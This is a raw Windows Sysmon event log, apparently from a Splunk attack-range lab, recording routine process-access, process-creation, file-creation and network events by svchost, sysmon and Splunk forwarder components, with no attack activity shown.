11:20:44.170{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222035Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:44.170{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222034Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:44.170{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222033Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:44.170{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222032Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:44.170{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222031Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:44.170{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222030Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:44.170{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222029Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:44.170{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222028Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:44.170{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222027Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:44.170{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-188C-6216-2B05-000000003902}3276C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000222026Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:44.170{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-188C-6216-2B05-000000003902}3276C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000222025Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:44.170{4F8D34B0-188C-6216-2B05-000000003902}3276C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000298194Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:45.670{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=86F1BF146614FF1EB598BE2633BB2080,SHA256=94885A7FCF4612783089843DC2F1FC801DD522DA141E70430BF8C2BF938B9A02,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222055Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:45.467{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3B3AFDFD69AB6927EF71193C1631D50,SHA256=C11A15222AF078FFC2195E58527A0CA7AF57F2EB4A2A0B45B738632B95DA427B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000298193Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:43.536{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49514-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000222054Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:45.232{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0BD6EA34B8289DA5159D19F6BD1AA96F,SHA256=2F05F3829F116F2A3DDC8CAA8024AFD0FE4B3E6BFB89C1A6FE5D8C2E2CA6377A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222053Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:45.232{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=071D152E001C0DB724A6AFB0F5F48697,SHA256=84A81F1E35F3A6F652422DEE00D5F0B47A93C4BF10FA179FCB2B9375CDCEA43F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000222071Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:46.810{4F8D34B0-188E-6216-2D05-000000003902}3956368C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000222070Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:46.654{4F8D34B0-F11D-6215-2300-000000003902}2036NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000222069Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:46.607{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-188E-6216-2D05-000000003902}3956C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222068Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:46.607{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222067Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:46.607{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222066Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:46.607{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222065Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:46.607{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222064Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:46.607{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222063Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:46.607{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222062Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:46.607{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222061Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:46.607{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222060Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 